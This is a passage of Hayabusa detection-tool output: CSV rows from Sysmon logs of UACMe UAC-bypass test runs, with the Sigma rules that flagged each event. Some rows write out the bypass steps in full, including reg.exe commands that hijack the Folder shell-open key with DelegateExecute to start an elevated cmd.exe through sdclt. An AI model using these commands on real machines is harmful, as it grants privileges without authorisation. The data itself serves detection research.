Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,../hayabusa-rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.144 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.508 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_41.evtx
2019-08-04 00:16:31.875 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:36.239 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:22.267 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.893 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.060 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 747F3D96-A105-5D46-0000-001071B8BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:35.454 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:57.800 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.714 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
